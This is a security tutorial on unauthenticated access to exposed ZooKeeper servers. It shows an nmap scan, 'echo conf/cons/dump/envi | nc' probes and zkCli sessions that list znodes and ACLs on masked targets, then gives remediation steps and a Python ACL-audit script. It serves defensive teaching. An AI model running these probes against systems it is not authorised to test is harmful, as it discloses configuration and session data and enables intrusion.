Shulou (Shulou.com), 06/02 report. Updated 2025-01-17. From: SLTechnology News&Howtos.
Preface
ZooKeeper is an open source coordination service for distributed applications, an open source implementation of Google's Chubby, and an important component of Hadoop and HBase. It provides consistency services for distributed applications, including configuration maintenance, naming services, distributed synchronization, and group services.
Unauthorized access to ZooKeeper arises because no authentication is required by default after installation and deployment. As a result, ZooKeeper can be used remotely and discloses a large amount of service-level information.
Default ports: 2181, 2182.
Probing for an open ZooKeeper service
To detect whether a target address is running the ZooKeeper service, use nmap to check whether port 2181 is open.
    root@kali:~# nmap -Pn -p 2181 xx.xx.xx.xx
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-21 01:56 EDT
    Nmap scan report for xx.xx.xx.xx.static.sz.js.chinamobile.com (xx.xx.xx.xx)
    Host is up (0.016s latency).

    PORT     STATE SERVICE
    2181/tcp open  eforward

    Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
For batch probing, only the destination address needs to be changed.
Get information
conf command
Outputs the service configuration details: port, data path, log path, session timeouts, maximum number of connections, and so on.
    root@kali:~# echo conf | nc xx.xx.xx.xx 2181
    clientPort=2171
    dataDir=/opt/data/zookeeper/data/version-2
    dataLogDir=/opt/data/zookeeper/data/version-2
    tickTime=2000
    maxClientCnxns=0
    minSessionTimeout=4000
    maxSessionTimeout=40000
    serverId=0
cons command
Lists the details of all clients / sessions connected to the current server.
    root@kali:~# echo cons | nc xx.xx.xx.xx 2181 | more
     /10.23.46.40:11958[1](queued=0,recved=27317,sent=27317,sid=0x1000000e029b16e,lop=PING,est=1571277639586,to=40000,lcxid=0x33,lzxid=0x286a720,lresp=2435779043,llat=0,minlat=0,avglat=0,maxlat=397)
     /10.23.46.39:9688[1](queued=0,recved=27316,sent=27316,sid=0x1000000e029b17c,lop=PING,est=1571277641790,to=40000,lcxid=0x33,lzxid=0x286a71c,lresp=2435777895,llat=0,minlat=0,avglat=0,maxlat=560)
dump command
Outputs outstanding sessions and ephemeral nodes. It is only valid on the leader node.
    root@kali:~# echo dump | nc xx.xx.xx.xx 2181 | more
    SessionTracker dump:
    Session Sets (21):
    0 expire at Thu Jan 29 12:38:08 CST 1970:
    0 expire at Thu Jan 29 12:38:10 CST 1970:
    3 expire at Thu Jan 29 12:38:12 CST 1970:
        0x1000000e01f0013
        0x1000000e029fdde
        0x1000000e029fe05
    2 expire at Thu Jan 29 12:38:14 CST 1970:
        0x1000000e02a4235
        0x1000000e01f00e9
    31 expire at Thu Jan 29 12:38:16 CST 1970:
        0x1000000e01f067a
        0x1000000e02a423c
        0x1000000e01f0008
        0x1000000e029fdf4
        ...
On non-leader nodes this command returns no relevant information.
envi command
Outputs details of the server environment.
    root@kali:~# echo envi | nc xx.xx.xx.xx 2181
    Environment:
    zookeeper.version=3.4.13-2d71af4dbe22557fda74f9a9b4309b15a7487f03, built on ... 04:05 GMT
    host.name=c1b69852-ac24-11e8-88d9-a4bf01306d06
    java.version=1.7.0_80
    java.vendor=Oracle Corporation
    java.home=/usr/java/jdk1.7.0_80/jre
    java.class.path=/opt/midware/zookeeper/bin/../build/classes:/opt/midware/zookeeper/bin/../build/lib/*.jar:/opt/midware/zookeeper/bin/../lib/slf4j-log4j12-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/slf4j-api-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/netty-3.10.6.Final.jar:/opt/midware/zookeeper/bin/../lib/log4j-1.2.17.jar:/opt/midware/zookeeper/bin/../lib/jline-0.9.94.jar:/opt/midware/zookeeper/bin/../lib/audience-annotations-0.5.0.jar:/opt/midware/zookeeper/bin/../zookeeper-3.4.13.jar:/opt/midware/zookeeper/bin/../src/java/lib/*.jar:/opt/midware/zookeeper/bin/../conf:
    java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
    java.io.tmpdir=/tmp
    java.compiler=
    os.name=Linux
    os.arch=amd64
    os.version=3.10.0-327.36.3.el7.x86_64
    user.name=root
    user.home=/root
    user.dir=/
Connection test
Install the tool
For example, on Kali you can install the ZooKeeper package with the following command and then use the client connection tool zkCli.sh.
    # apt-get install zookeeper
    ...
    root@kali:~# cd /usr/share/zookeeper/bin/
    root@kali:/usr/share/zookeeper/bin# ls
    zkCleanup.sh  zkCli.sh  zkEnv.sh  zkServer.sh
Connect to the target
Use the -server parameter to specify the target to connect to.
    root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181
    Connecting to xx.xx.xx.xx:2181
    Welcome to ZooKeeper!
    JLine support is enabled
    [zk: xx.xx.xx.xx:2181(CONNECTING) 0]
... Connected
Get system-related information
    root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181
    Connecting to xx.xx.xx.xx:2181
    Welcome to ZooKeeper!
    JLine support is enabled
    [zk: xx.xx.xx.xx:2181(CONNECTING) 0]
    WATCHER::

    WatchedEvent state:SyncConnected type:None path:null
    [zk: xx.xx.xx.xx:2181(CONNECTED) 0] ls /
    [service, pms, DsMaster, Resource, monitor_lock, zookeeper]
    [zk: xx.xx.xx.xx:2181(CONNECTED) 1] get /

    cZxid = 0x0
    ctime = Wed Dec 31 19:00:00 EST 1969
    mZxid = 0x0
    mtime = Wed Dec 31 19:00:00 EST 1969
    pZxid = 4
    dataVersion = 0
    aclVersion = 0
    ephemeralOwner = 0x0
    dataLength = 0
    numChildren = 6
    [zk: xx.xx.xx.xx:2181(CONNECTED) 2] get /service

    cZxid = 0x2
    ctime = Thu Aug 30 02:58:40 EDT 2018
    mZxid = 0x2
    mtime = Thu Aug 30 02:58:40 EDT 2018
    pZxid = 0x1cb884d
    cversion = 7
    dataVersion = 0
    aclVersion = 0
    ephemeralOwner = 0x0
    dataLength = 0
    numChildren = 3
    [zk: xx.xx.xx.xx:2181(CONNECTED) 3] getAcl /
    'world,'anyone
    : cdrwa
Remediation
1. Set a firewall policy to restrict access by IP [this option is recommended]
2. Do not expose ZooKeeper to the public network.
3. Set up user authentication and ACLs.
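For item 3, an added example (not part of the original article) that parses zkCli `getAcl` output in the format shown above, flags znodes still open to world:anyone, and builds the `setAcl` command for a digest ACL. The account name, password, sample tree and function names are assumptions made for illustration; the id format is the digest scheme's user:base64(SHA-1("user:password")).

```python
import base64
import hashlib
import re

# One ACL entry as zkCli prints it: 'scheme,'id on one line, ": perms" on the next.
ACL_RE = re.compile(r"'(\w+),'(.*)\n:\s*([cdrwa]+)")

def digest_id(user, password):
    """ACL id for the digest scheme: user:base64(sha1("user:password"))."""
    raw = hashlib.sha1(f"{user}:{password}".encode()).digest()
    return f"{user}:{base64.b64encode(raw).decode()}"

def parse_acl(getacl_output):
    """Turn zkCli `getAcl` output into (scheme, id, perms) tuples."""
    return ACL_RE.findall(getacl_output)

def audit(acls_by_path):
    """Return the paths whose ACL grants any permission to world:anyone."""
    open_paths = []
    for path, output in sorted(acls_by_path.items()):
        if any(s == "world" and i == "anyone" for s, i, _ in parse_acl(output)):
            open_paths.append(path)
    return open_paths

def fix_commands(open_paths, user, password, perms="cdrwa"):
    """zkCli commands that replace the open ACL with a digest ACL."""
    acl = f"digest:{digest_id(user, password)}:{perms}"
    return [f"setAcl {p} {acl}" for p in open_paths]

# Constructed sample input: getAcl output collected per znode.
# "zkadmin" / "example-only" are placeholder credentials (assumption).
SAMPLE = {
    "/": "'world,'anyone\n: cdrwa\n",
    "/service": "'world,'anyone\n: cdrwa\n",
    "/pms": f"'digest,'{digest_id('zkadmin', 'example-only')}\n: cdrwa\n",
}

if __name__ == "__main__":
    for cmd in fix_commands(audit(SAMPLE), "zkadmin", "example-only"):
        print(cmd)
```

ACLs are set per znode and are not inherited by children, so every flagged path needs its own `setAcl`. Clients must then run `addauth digest user:password` before they can access those znodes.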